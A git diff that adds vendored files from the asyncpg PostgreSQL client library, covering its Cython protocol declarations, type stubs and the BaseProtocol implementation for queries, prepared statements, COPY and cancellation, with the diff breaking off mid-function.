+1,77 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +from libc.stdint cimport int16_t, int32_t, uint16_t, \ + uint32_t, int64_t, uint64_t + +from asyncpg.pgproto.debug cimport PG_DEBUG + +from asyncpg.pgproto.pgproto cimport ( + WriteBuffer, + ReadBuffer, + FRBuffer, +) + +from asyncpg.pgproto cimport pgproto + +include "consts.pxi" +include "pgtypes.pxi" + +include "codecs/base.pxd" +include "settings.pxd" +include "coreproto.pxd" +include "prepared_stmt.pxd" + + +cdef class BaseProtocol(CoreProtocol): + + cdef: + object loop + ConnectionSettings settings + object cancel_sent_waiter + object cancel_waiter + object waiter + bint return_extra + object create_future + object timeout_handle + object conref + type record_class + bint is_reading + + str last_query + + bint writing_paused + bint closing + + readonly uint64_t queries_count + + bint _is_ssl + + PreparedStatementState statement + + cdef get_connection(self) + + cdef _get_timeout_impl(self, timeout) + cdef _check_state(self) + cdef _new_waiter(self, timeout) + cdef _coreproto_error(self) + + cdef _on_result__connect(self, object waiter) + cdef _on_result__prepare(self, object waiter) + cdef _on_result__bind_and_exec(self, object waiter) + cdef _on_result__close_stmt_or_portal(self, object waiter) + cdef _on_result__simple_query(self, object waiter) + cdef _on_result__bind(self, object waiter) + cdef _on_result__copy_out(self, object waiter) + cdef _on_result__copy_in(self, object waiter) + + cdef _handle_waiter_on_connection_lost(self, cause) + + cdef _dispatch_result(self) + + cdef inline resume_reading(self) + cdef inline pause_reading(self) diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pyi b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pyi new file mode 100755 index 0000000..34db644 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pyi @@ -0,0 +1,282 @@ +import asyncio +import asyncio.protocols +import hmac +from codecs import CodecInfo +from collections.abc import Callable, Iterable, Sequence +from hashlib import md5, sha256 +from typing import ( + Any, + ClassVar, + Final, + Generic, + Literal, + NewType, + TypeVar, + final, + overload, +) +from typing_extensions import TypeAlias + +import asyncpg.pgproto.pgproto + +from ..connect_utils import _ConnectionParameters +from ..pgproto.pgproto import WriteBuffer +from ..types import Attribute, Type +from .record import Record + +_Record = TypeVar('_Record', bound=Record) +_OtherRecord = TypeVar('_OtherRecord', bound=Record) +_PreparedStatementState = TypeVar( + '_PreparedStatementState', bound=PreparedStatementState[Any] +) + +_NoTimeoutType = NewType('_NoTimeoutType', object) +_TimeoutType: TypeAlias = float | None | _NoTimeoutType + +BUILTIN_TYPE_NAME_MAP: Final[dict[str, int]] +BUILTIN_TYPE_OID_MAP: Final[dict[int, str]] +NO_TIMEOUT: Final[_NoTimeoutType] + +hashlib_md5 = md5 + +@final +class ConnectionSettings(asyncpg.pgproto.pgproto.CodecContext): + __pyx_vtable__: Any + def __init__(self, conn_key: object) -> None: ... + def add_python_codec( + self, + typeoid: int, + typename: str, + typeschema: str, + typeinfos: Iterable[object], + typekind: str, + encoder: Callable[[Any], Any], + decoder: Callable[[Any], Any], + format: object, + ) -> Any: ... + def clear_type_cache(self) -> None: ... + def get_data_codec( + self, oid: int, format: object = ..., ignore_custom_codec: bool = ... + ) -> Any: ... + def get_text_codec(self) -> CodecInfo: ... + def register_data_types(self, types: Iterable[object]) -> None: ... + def remove_python_codec( + self, typeoid: int, typename: str, typeschema: str + ) -> None: ... + def set_builtin_type_codec( + self, + typeoid: int, + typename: str, + typeschema: str, + typekind: str, + alias_to: str, + format: object = ..., + ) -> Any: ... + def __getattr__(self, name: str) -> Any: ... + def __reduce__(self) -> Any: ... + +@final +class PreparedStatementState(Generic[_Record]): + closed: bool + prepared: bool + name: str + query: str + refs: int + record_class: type[_Record] + ignore_custom_codec: bool + __pyx_vtable__: Any + def __init__( + self, + name: str, + query: str, + protocol: BaseProtocol[Any], + record_class: type[_Record], + ignore_custom_codec: bool, + ) -> None: ... + def _get_parameters(self) -> tuple[Type, ...]: ... + def _get_attributes(self) -> tuple[Attribute, ...]: ... + def _init_types(self) -> set[int]: ... + def _init_codecs(self) -> None: ... + def attach(self) -> None: ... + def detach(self) -> None: ... + def mark_closed(self) -> None: ... + def mark_unprepared(self) -> None: ... + def __reduce__(self) -> Any: ... + +class CoreProtocol: + backend_pid: Any + backend_secret: Any + __pyx_vtable__: Any + def __init__(self, addr: object, con_params: _ConnectionParameters) -> None: ... + def is_in_transaction(self) -> bool: ... + def __reduce__(self) -> Any: ... + +class BaseProtocol(CoreProtocol, Generic[_Record]): + queries_count: Any + is_ssl: bool + __pyx_vtable__: Any + def __init__( + self, + addr: object, + connected_fut: object, + con_params: _ConnectionParameters, + record_class: type[_Record], + loop: object, + ) -> None: ... + def set_connection(self, connection: object) -> None: ... + def get_server_pid(self, *args: object, **kwargs: object) -> int: ... + def get_settings(self, *args: object, **kwargs: object) -> ConnectionSettings: ... + def get_record_class(self) -> type[_Record]: ... + def abort(self) -> None: ... + async def bind( + self, + state: PreparedStatementState[_OtherRecord], + args: Sequence[object], + portal_name: str, + timeout: _TimeoutType, + ) -> Any: ... + @overload + async def bind_execute( + self, + state: PreparedStatementState[_OtherRecord], + args: Sequence[object], + portal_name: str, + limit: int, + return_extra: Literal[False], + timeout: _TimeoutType, + ) -> list[_OtherRecord]: ... + @overload + async def bind_execute( + self, + state: PreparedStatementState[_OtherRecord], + args: Sequence[object], + portal_name: str, + limit: int, + return_extra: Literal[True], + timeout: _TimeoutType, + ) -> tuple[list[_OtherRecord], bytes, bool]: ... + @overload + async def bind_execute( + self, + state: PreparedStatementState[_OtherRecord], + args: Sequence[object], + portal_name: str, + limit: int, + return_extra: bool, + timeout: _TimeoutType, + ) -> list[_OtherRecord] | tuple[list[_OtherRecord], bytes, bool]: ... + async def bind_execute_many( + self, + state: PreparedStatementState[_OtherRecord], + args: Iterable[Sequence[object]], + portal_name: str, + timeout: _TimeoutType, + ) -> None: ... + async def close(self, timeout: _TimeoutType) -> None: ... + def _get_timeout(self, timeout: _TimeoutType) -> float | None: ... + def _is_cancelling(self) -> bool: ... + async def _wait_for_cancellation(self) -> None: ... + async def close_statement( + self, state: PreparedStatementState[_OtherRecord], timeout: _TimeoutType + ) -> Any: ... + async def copy_in(self, *args: object, **kwargs: object) -> str: ... + async def copy_out(self, *args: object, **kwargs: object) -> str: ... + async def execute(self, *args: object, **kwargs: object) -> Any: ... + def is_closed(self, *args: object, **kwargs: object) -> Any: ... + def is_connected(self, *args: object, **kwargs: object) -> Any: ... + def data_received(self, data: object) -> None: ... + def connection_made(self, transport: object) -> None: ... + def connection_lost(self, exc: Exception | None) -> None: ... + def pause_writing(self, *args: object, **kwargs: object) -> Any: ... + @overload + async def prepare( + self, + stmt_name: str, + query: str, + timeout: float | None = ..., + *, + state: _PreparedStatementState, + ignore_custom_codec: bool = ..., + record_class: None, + ) -> _PreparedStatementState: ... + @overload + async def prepare( + self, + stmt_name: str, + query: str, + timeout: float | None = ..., + *, + state: None = ..., + ignore_custom_codec: bool = ..., + record_class: type[_OtherRecord], + ) -> PreparedStatementState[_OtherRecord]: ... + async def close_portal(self, portal_name: str, timeout: _TimeoutType) -> None: ... + async def query(self, *args: object, **kwargs: object) -> str: ... + def resume_writing(self, *args: object, **kwargs: object) -> Any: ... + def __reduce__(self) -> Any: ... + +@final +class Codec: + __pyx_vtable__: Any + def __reduce__(self) -> Any: ... + +class DataCodecConfig: + __pyx_vtable__: Any + def __init__(self) -> None: ... + def add_python_codec( + self, + typeoid: int, + typename: str, + typeschema: str, + typekind: str, + typeinfos: Iterable[object], + encoder: Callable[[ConnectionSettings, WriteBuffer, object], object], + decoder: Callable[..., object], + format: object, + xformat: object, + ) -> Any: ... + def add_types(self, types: Iterable[object]) -> Any: ... + def clear_type_cache(self) -> None: ... + def declare_fallback_codec(self, oid: int, name: str, schema: str) -> Codec: ... + def remove_python_codec( + self, typeoid: int, typename: str, typeschema: str + ) -> Any: ... + def set_builtin_type_codec( + self, + typeoid: int, + typename: str, + typeschema: str, + typekind: str, + alias_to: str, + format: object = ..., + ) -> Any: ... + def __reduce__(self) -> Any: ... + +class Protocol(BaseProtocol[_Record], asyncio.protocols.Protocol): ... + +class Timer: + def __init__(self, budget: float | None) -> None: ... + def __enter__(self) -> None: ... + def __exit__(self, et: object, e: object, tb: object) -> None: ... + def get_remaining_budget(self) -> float: ... + def has_budget_greater_than(self, amount: float) -> bool: ... + +@final +class SCRAMAuthentication: + AUTHENTICATION_METHODS: ClassVar[list[str]] + DEFAULT_CLIENT_NONCE_BYTES: ClassVar[int] + DIGEST = sha256 + REQUIREMENTS_CLIENT_FINAL_MESSAGE: ClassVar[list[str]] + REQUIREMENTS_CLIENT_PROOF: ClassVar[list[str]] + SASLPREP_PROHIBITED: ClassVar[tuple[Callable[[str], bool], ...]] + authentication_method: bytes + authorization_message: bytes | None + client_channel_binding: bytes + client_first_message_bare: bytes | None + client_nonce: bytes | None + client_proof: bytes | None + password_salt: bytes | None + password_iterations: int + server_first_message: bytes | None + server_key: hmac.HMAC | None + server_nonce: bytes | None diff --git a/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pyx b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pyx new file mode 100755 index 0000000..acce4e9 --- /dev/null +++ b/code-server-config/.local/lib/python3.12/site-packages/asyncpg/protocol/protocol.pyx @@ -0,0 +1,1051 @@ +# Copyright (C) 2016-present the asyncpg authors and contributors +# +# +# This module is part of asyncpg and is released under +# the Apache 2.0 License: http://www.apache.org/licenses/LICENSE-2.0 + + +# cython: language_level=3 + +cimport cython +cimport cpython + +import asyncio +import builtins +import codecs +import collections.abc +import socket +import time +import weakref + +from asyncpg.pgproto.pgproto cimport ( + WriteBuffer, + ReadBuffer, + + FRBuffer, + frb_init, + frb_read, + frb_read_all, + frb_slice_from, + frb_check, + frb_set_len, + frb_get_len, +) + +from asyncpg.pgproto cimport pgproto +from asyncpg.protocol cimport cpythonx +from asyncpg.protocol cimport recordcapi + +from libc.stdint cimport int8_t, uint8_t, int16_t, uint16_t, \ + int32_t, uint32_t, int64_t, uint64_t, \ + INT32_MAX, UINT32_MAX + +from asyncpg.exceptions import _base as apg_exc_base +from asyncpg import compat +from asyncpg import types as apg_types +from asyncpg import exceptions as apg_exc + +from asyncpg.pgproto cimport hton +from asyncpg.protocol.record import Record, RecordDescriptor + + +include "consts.pxi" +include "pgtypes.pxi" + +include "encodings.pyx" +include "settings.pyx" + +include "codecs/base.pyx" +include "codecs/textutils.pyx" + +# register codecs provided by pgproto +include "codecs/pgproto.pyx" + +# nonscalar +include "codecs/array.pyx" +include "codecs/range.pyx" +include "codecs/record.pyx" + +include "coreproto.pyx" +include "prepared_stmt.pyx" + + +NO_TIMEOUT = object() + + +cdef class BaseProtocol(CoreProtocol): + def __init__(self, addr, connected_fut, con_params, record_class: type, loop): + # type of `con_params` is `_ConnectionParameters` + CoreProtocol.__init__(self, addr, con_params) + + self.loop = loop + self.transport = None + self.waiter = connected_fut + self.cancel_waiter = None + self.cancel_sent_waiter = None + + self.settings = ConnectionSettings((addr, con_params.database)) + self.record_class = record_class + + self.statement = None + self.return_extra = False + + self.last_query = None + + self.closing = False + self.is_reading = True + self.writing_allowed = asyncio.Event() + self.writing_allowed.set() + + self.timeout_handle = None + + self.queries_count = 0 + + self._is_ssl = False + + try: + self.create_future = loop.create_future + except AttributeError: + self.create_future = self._create_future_fallback + + def set_connection(self, connection): + self.conref = weakref.ref(connection) + + cdef get_connection(self): + if self.conref is not None: + return self.conref() + else: + return None + + def get_server_pid(self): + return self.backend_pid + + def get_settings(self): + return self.settings + + def get_record_class(self): + return self.record_class + + cdef inline resume_reading(self): + if not self.is_reading: + self.is_reading = True + self.transport.resume_reading() + + cdef inline pause_reading(self): + if self.is_reading: + self.is_reading = False + self.transport.pause_reading() + + async def prepare(self, stmt_name, query, timeout, + *, + PreparedStatementState state=None, + ignore_custom_codec=False, + record_class): + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + timeout = self._get_timeout_impl(timeout) + + waiter = self._new_waiter(timeout) + try: + self._prepare_and_describe(stmt_name, query) # network op + self.last_query = query + if state is None: + state = PreparedStatementState( + stmt_name, query, self, record_class, ignore_custom_codec) + self.statement = state + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def bind_execute( + self, + state: PreparedStatementState, + args, + portal_name: str, + limit: int, + return_extra: bool, + timeout, + ): + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + timeout = self._get_timeout_impl(timeout) + args_buf = state._encode_bind_msg(args) + + waiter = self._new_waiter(timeout) + try: + if not state.prepared: + self._send_parse_message(state.name, state.query) + + self._bind_execute( + portal_name, + state.name, + args_buf, + limit) # network op + + self.last_query = state.query + self.statement = state + self.return_extra = return_extra + self.queries_count += 1 + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def bind_execute_many( + self, + state: PreparedStatementState, + args, + portal_name: str, + timeout, + return_rows: bool, + ): + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + timeout = self._get_timeout_impl(timeout) + timer = Timer(timeout) + + # Make sure the argument sequence is encoded lazily with + # this generator expression to keep the memory pressure under + # control. + data_gen = (state._encode_bind_msg(b, i) for i, b in enumerate(args)) + arg_bufs = iter(data_gen) + + waiter = self._new_waiter(timeout) + try: + if not state.prepared: + self._send_parse_message(state.name, state.query) + + more = self._bind_execute_many( + portal_name, + state.name, + arg_bufs, + return_rows) # network op + + self.last_query = state.query + self.statement = state + self.return_extra = False + self.queries_count += 1 + + while more: + with timer: + await compat.wait_for( + self.writing_allowed.wait(), + timeout=timer.get_remaining_budget()) + # On Windows the above event somehow won't allow context + # switch, so forcing one with sleep(0) here + await asyncio.sleep(0) + if not timer.has_budget_greater_than(0): + raise asyncio.TimeoutError + more = self._bind_execute_many_more() # network op + + except asyncio.TimeoutError as e: + self._bind_execute_many_fail(e) # network op + + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def bind(self, PreparedStatementState state, args, + str portal_name, timeout): + + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + timeout = self._get_timeout_impl(timeout) + args_buf = state._encode_bind_msg(args) + + waiter = self._new_waiter(timeout) + try: + self._bind( + portal_name, + state.name, + args_buf) # network op + + self.last_query = state.query + self.statement = state + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def execute(self, PreparedStatementState state, + str portal_name, int limit, return_extra, + timeout): + + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + timeout = self._get_timeout_impl(timeout) + + waiter = self._new_waiter(timeout) + try: + self._execute( + portal_name, + limit) # network op + + self.last_query = state.query + self.statement = state + self.return_extra = return_extra + self.queries_count += 1 + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def close_portal(self, str portal_name, timeout): + + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + timeout = self._get_timeout_impl(timeout) + + waiter = self._new_waiter(timeout) + try: + self._close( + portal_name, + True) # network op + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def query(self, query, timeout): + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + # query() needs to call _get_timeout instead of _get_timeout_impl + # for consistent validation, as it is called differently from + # prepare/bind/execute methods. + timeout = self._get_timeout(timeout) + + waiter = self._new_waiter(timeout) + try: + self._simple_query(query) # network op + self.last_query = query + self.queries_count += 1 + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + async def copy_out(self, copy_stmt, sink, timeout): + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + + timeout = self._get_timeout_impl(timeout) + timer = Timer(timeout) + + # The copy operation is guarded by a single timeout + # on the top level. + waiter = self._new_waiter(timer.get_remaining_budget()) + + self._copy_out(copy_stmt) + + try: + while True: + self.resume_reading() + + with timer: + buffer, done, status_msg = await waiter + + # buffer will be empty if CopyDone was received apart from + # the last CopyData message. + if buffer: + try: + with timer: + await compat.wait_for( + sink(buffer), + timeout=timer.get_remaining_budget()) + except (Exception, asyncio.CancelledError) as ex: + # Abort the COPY operation on any error in + # output sink. + self._request_cancel() + # Make asyncio shut up about unretrieved + # QueryCanceledError + waiter.add_done_callback(lambda f: f.exception()) + raise + + # done will be True upon receipt of CopyDone. + if done: + break + + waiter = self._new_waiter(timer.get_remaining_budget()) + + finally: + self.resume_reading() + + return status_msg + + async def copy_in(self, copy_stmt, reader, data, + records, PreparedStatementState record_stmt, timeout): + cdef: + WriteBuffer wbuf + ssize_t num_cols + Codec codec + + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + + timeout = self._get_timeout_impl(timeout) + timer = Timer(timeout) + + waiter = self._new_waiter(timer.get_remaining_budget()) + + # Initiate COPY IN. + self._copy_in(copy_stmt) + + try: + if record_stmt is not None: + # copy_in_records in binary mode + wbuf = WriteBuffer.new() + # Signature + wbuf.write_bytes(_COPY_SIGNATURE) + # Flags field + wbuf.write_int32(0) + # No header extension + wbuf.write_int32(0) + + record_stmt._ensure_rows_decoder() + codecs = record_stmt.rows_codecs + num_cols = len(codecs) + settings = self.settings + + for codec in codecs: + if (not codec.has_encoder() or + codec.format != PG_FORMAT_BINARY): + raise apg_exc.InternalClientError( + 'no binary format encoder for ' + 'type {} (OID {})'.format(codec.name, codec.oid)) + + if isinstance(records, collections.abc.AsyncIterable): + async for row in records: + # Tuple header + wbuf.write_int16(num_cols) + # Tuple data + for i in range(num_cols): + item = row[i] + if item is None: + wbuf.write_int32(-1) + else: + codec = cpython.PyTuple_GET_ITEM( + codecs, i) + codec.encode(settings, wbuf, item) + + if wbuf.len() >= _COPY_BUFFER_SIZE: + with timer: + await self.writing_allowed.wait() + self._write_copy_data_msg(wbuf) + wbuf = WriteBuffer.new() + else: + for row in records: + # Tuple header + wbuf.write_int16(num_cols) + # Tuple data + for i in range(num_cols): + item = row[i] + if item is None: + wbuf.write_int32(-1) + else: + codec = cpython.PyTuple_GET_ITEM( + codecs, i) + codec.encode(settings, wbuf, item) + + if wbuf.len() >= _COPY_BUFFER_SIZE: + with timer: + await self.writing_allowed.wait() + self._write_copy_data_msg(wbuf) + wbuf = WriteBuffer.new() + + # End of binary copy. + wbuf.write_int16(-1) + self._write_copy_data_msg(wbuf) + + elif reader is not None: + try: + aiter = reader.__aiter__ + except AttributeError: + raise TypeError('reader is not an asynchronous iterable') + else: + iterator = aiter() + + try: + while True: + # We rely on protocol flow control to moderate the + # rate of data messages. + with timer: + await self.writing_allowed.wait() + with timer: + chunk = await compat.wait_for( + iterator.__anext__(), + timeout=timer.get_remaining_budget()) + self._write_copy_data_msg(chunk) + except builtins.StopAsyncIteration: + pass + else: + # Buffer passed in directly. + await self.writing_allowed.wait() + self._write_copy_data_msg(data) + + except asyncio.TimeoutError: + self._write_copy_fail_msg('TimeoutError') + self._on_timeout(self.waiter) + try: + await waiter + except TimeoutError: + raise + else: + raise apg_exc.InternalClientError('TimoutError was not raised') + + except (Exception, asyncio.CancelledError) as e: + self._write_copy_fail_msg(str(e)) + self._request_cancel() + # Make asyncio shut up about unretrieved QueryCanceledError + waiter.add_done_callback(lambda f: f.exception()) + raise + + self._write_copy_done_msg() + + status_msg = await waiter + + return status_msg + + async def close_statement(self, PreparedStatementState state, timeout): + if self.cancel_waiter is not None: + await self.cancel_waiter + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + self._check_state() + + if state.refs != 0: + raise apg_exc.InternalClientError( + 'cannot close prepared statement; refs == {} != 0'.format( + state.refs)) + + timeout = self._get_timeout_impl(timeout) + waiter = self._new_waiter(timeout) + try: + self._close(state.name, False) # network op + state.closed = True + except Exception as ex: + waiter.set_exception(ex) + self._coreproto_error() + finally: + return await waiter + + def is_closed(self): + return self.closing + + def is_connected(self): + return not self.closing and self.con_status == CONNECTION_OK + + def abort(self): + if self.closing: + return + self.closing = True + self._handle_waiter_on_connection_lost(None) + self._terminate() + self.transport.abort() + self.transport = None + + async def close(self, timeout): + if self.closing: + return + + self.closing = True + + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + + if self.cancel_waiter is not None: + await self.cancel_waiter + + if self.waiter is not None: + # If there is a query running, cancel it + self._request_cancel() + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + if self.cancel_waiter is not None: + await self.cancel_waiter + + assert self.waiter is None + + timeout = self._get_timeout_impl(timeout) + + # Ask the server to terminate the connection and wait for it + # to drop. + self.waiter = self._new_waiter(timeout) + self._terminate() + try: + await self.waiter + except ConnectionResetError: + # There appears to be a difference in behaviour of asyncio + # in Windows, where, instead of calling protocol.connection_lost() + # a ConnectionResetError will be thrown into the task. + pass + finally: + self.waiter = None + self.transport.abort() + + def _request_cancel(self): + self.cancel_waiter = self.create_future() + self.cancel_sent_waiter = self.create_future() + + con = self.get_connection() + if con is not None: + # if 'con' is None it means that the connection object has been + # garbage collected and that the transport will soon be aborted. + con._cancel_current_command(self.cancel_sent_waiter) + else: + self.loop.call_exception_handler({ + 'message': 'asyncpg.Protocol has no reference to its ' + 'Connection object and yet a cancellation ' + 'was requested. Please report this at ' + 'github.com/magicstack/asyncpg.' + }) + self.abort() + + if self.state == PROTOCOL_PREPARE: + # we need to send a SYNC to server if we cancel during the PREPARE phase + # because the PREPARE sequence does not send a SYNC itself. + # we cannot send this extra SYNC if we are not in PREPARE phase, + # because then we would issue two SYNCs and we would get two ReadyForQuery + # replies, which our current state machine implementation cannot handle + self._write(SYNC_MESSAGE) + self._set_state(PROTOCOL_CANCELLED) + + def _on_timeout(self, fut): + if self.waiter is not fut or fut.done() or \ + self.cancel_waiter is not None or \ + self.timeout_handle is None: + return + self._request_cancel() + self.waiter.set_exception(asyncio.TimeoutError()) + + def _on_waiter_completed(self, fut): + if self.timeout_handle: + self.timeout_handle.cancel() + self.timeout_handle = None + if fut is not self.waiter or self.cancel_waiter is not None: + return + if fut.cancelled(): + self._request_cancel() + + def _create_future_fallback(self): + return asyncio.Future(loop=self.loop) + + cdef _handle_waiter_on_connection_lost(self, cause): + if self.waiter is not None and not self.waiter.done(): + exc = apg_exc.ConnectionDoesNotExistError( + 'connection was closed in the middle of ' + 'operation') + if cause is not None: + exc.__cause__ = cause + self.waiter.set_exception(exc) + self.waiter = None + + cdef _set_server_parameter(self, name, val): + self.settings.add_setting(name, val) + + def _get_timeout(self, timeout): + if timeout is not None: + try: + if type(timeout) is bool: + raise ValueError + timeout = float(timeout) + except ValueError: + raise ValueError( + 'invalid timeout value: expected non-negative float ' + '(got {!r})'.format(timeout)) from None + + return self._get_timeout_impl(timeout) + + cdef inline _get_timeout_impl(self, timeout): + if timeout is None: + timeout = self.get_connection()._config.command_timeout + elif timeout is NO_TIMEOUT: + timeout = None + else: + timeout = float(timeout) + + if timeout is not None and timeout <= 0: + raise asyncio.TimeoutError() + return timeout + + cdef _check_state(self): + if self.cancel_waiter is not None: + raise apg_exc.InterfaceError( + 'cannot perform operation: another operation is cancelling') + if self.closing: + raise apg_exc.InterfaceError( + 'cannot perform operation: connection is closed') + if self.waiter is not None or self.timeout_handle is not None: + raise apg_exc.InterfaceError( + 'cannot perform operation: another operation is in progress') + + def _is_cancelling(self): + return ( + self.cancel_waiter is not None or + self.cancel_sent_waiter is not None + ) + + async def _wait_for_cancellation(self): + if self.cancel_sent_waiter is not None: + await self.cancel_sent_waiter + self.cancel_sent_waiter = None + if self.cancel_waiter is not None: + await self.cancel_waiter + + cdef _coreproto_error(self): + try: + if self.waiter is not None: + if not self.waiter.done(): + raise apg_exc.InternalClientError( + 'waiter is not done while handling critical ' + 'protocol error') + self.waiter = None + finally: + self.abort() + + cdef _new_waiter(self, timeout): + if self.waiter is not None: + raise apg_exc.InterfaceError( + 'cannot perform operation: another operation is in progress') + self.waiter = self.create_future() + if timeout is not None: + self.timeout_handle = self.loop.call_later( + timeout, self._on_timeout, self.waiter) + self.waiter.add_done_callback(self._on_waiter_completed) + return self.waiter + + cdef _on_result__connect(self, object waiter): + waiter.set_result(True) + + cdef _on_result__prepare(self, object waiter): + if PG_DEBUG: + if self.statement is None: + raise apg_exc.InternalClientError( + '_on_result__prepare: statement is None') + + if self.result_param_desc is not None: + self.statement._set_args_desc(self.result_param_desc) + if self.result_row_desc is not None: + self.statement._set_row_desc(self.result_row_desc) + waiter.set_result(self.statement) + + cdef _on_result__bind_and_exec(self, object waiter): + if self.return_extra: + waiter.set_result(( + self.result, + self.result_status_msg, + self.result_execute_completed)) + else: + waiter.set_result(self.result) + + cdef _on_result__bind(self, object waiter): + waiter.set_result(self.result) + + cdef _on_result__close_stmt_or_portal(self, object waiter): + waiter.set_result(self.result) + + cdef _on_result__simple_query(self, object waiter): + waiter.set_result(self.result_status_msg.decode(self.encoding)) + + cdef _on_result__copy_out(self, object waiter): + cdef bint copy_done = self.state == PROTOCOL_COPY_OUT_DONE + if copy_done: + status_msg = self.result_status_msg.decode(self.encoding) + else: + status_msg = None + + # We need to put some backpressure on Postgres + # here in case the sink is slow to process the output. + self.pause_reading() + + waiter.set_result((self.result, copy_done, status_msg)) + + cdef _on_result__copy_in(self, object waiter): + status_msg = self.result_status_msg.decode(self.encoding) + waiter.set_result(status_msg) + + cdef _decode_row(self, const char* buf, ssize_t buf_len): + if PG_DEBUG: + if self.statement is None: + raise apg_exc.InternalClientError( + '_decode_row: statement is None') + + return self.statement._decode_row(buf, buf_len) + + cdef _dispatch_result(self): + waiter = self.waiter + self.waiter = None + + if PG_DEBUG: + if waiter is None: + raise apg_exc.InternalClientError('_on_result: waiter is None') + + if waiter.cancelled(): + return + + if waiter.done(): + raise apg_exc.InternalClientError('_on_result: waiter is done') + + if self.result_type == RESULT_FAILED: + if isinstance(self.result, dict): + exc = apg_exc_base.PostgresError.new( + self.result, query=self.last_query) + else: + exc = self.result + waiter.set_exception(exc) + return + + try: + if self.state == PROTOCOL_AUTH: + self._on_result__connect(waiter) + + elif self.state == PROTOCOL_PREPARE: + self._on_result__prepare(waiter) + + elif self.state == PROTOCOL_BIND_EXECUTE: + self._on_result__bind_and_exec(waiter) + + elif self.state == PROTOCOL_BIND_EXECUTE_MANY: + self._on_result__bind_and_exec(waiter) + + elif self.state == PROTOCOL_EXECUTE: + self._on_result__bind_and_exec(waiter) + + elif self.state == PROTOCOL_BIND: + self._on_result__bind(waiter) + + elif self.state == PROTOCOL_CLOSE_STMT_PORTAL: + self._on_result__close_stmt_or_portal(waiter) + + elif self.state == PROTOCOL_SIMPLE_QUERY: + self._on_result__simple_query(waiter) + + elif (self.state == PROTOCOL_COPY_OUT_DATA or + self.state == PROTOCOL_COPY_OUT_DONE): + self._on_result__copy_out(waiter) + + elif self.state == PROTOCOL_COPY_IN_DATA: + self._on_result__copy_in(waiter) + + elif self.state == PROTOCOL_TERMINATING: + # We are waiting for the connection to drop, so + # ignore any stray results at this point. + pass + + else: + raise apg_exc.InternalClientError( + 'got result for unknown protocol state {}'. + format(self.state)) + + except Exception as exc: + waiter.set_exception(exc) + + cdef _on_result(self): + if self.timeout_handle is not None: + self.timeout_handle.cancel() + self.timeout_handle = None + + if self.cancel_waiter is not None: + # We have received the result of a cancelled command. + if not self.cancel_waiter.done(): + # The cancellation future might have been cancelled + # by the cancellation of the entire task running the query. + self.cancel_waiter.set_result(None) + self.cancel_waiter = None + if self.waiter is not None and self.waiter.done(): + self.waiter = None + if self.waiter is None: + return + + try: + self._dispatch_result() + finally: + self.statement = None + self.last_query = None + self.return_extra = False + + cdef _on_notice(self, parsed): + con = self.get_connection() + if con is not None: + con._process_log_message(parsed, self.last_query) + + cdef _on_notification(self, pid, channel, payload): + con = self.get_connection() + if con is not None: + con._process_notification(pid, channel, payload) + + cdef _on_connection_lost(self, exc): + if self.closing: + # The connection was lost because + # Protocol.close() was called + if self.waiter is not None and not self.waiter.done(): + if exc is None: + self.waiter.set_result(None) + else: + self.waiter.set_exception(exc) + self.waiter = None + else: + # The connection was lost because it was + # terminated or due to another error; + # Throw an error in any awaiting waiter. + self.closing = True + # Cleanup the connection resources, including, possibly, + # releasing the pool holder. + con = self.get_connection() + if con is not None: + con._cleanup() + self._handle_waiter_on_connection_lost(exc) + + cdef _write(self, buf): + self.transport.write(memoryview(buf)) + + cdef _writelines(self, list buffers): + self.transport.writelines(buffers) + + # asyncio callbacks: + + def data_received(self, data): + self.buffer.feed_data(data) + self._read_server_messages() + + def connection_made(self, transport): + self.transport = transport + + sock = transport.get_extra_info('socket') + if (sock is not None and + (not hasattr(socket, 'AF_UNIX') + or sock.family != socket.AF_UNIX)): + 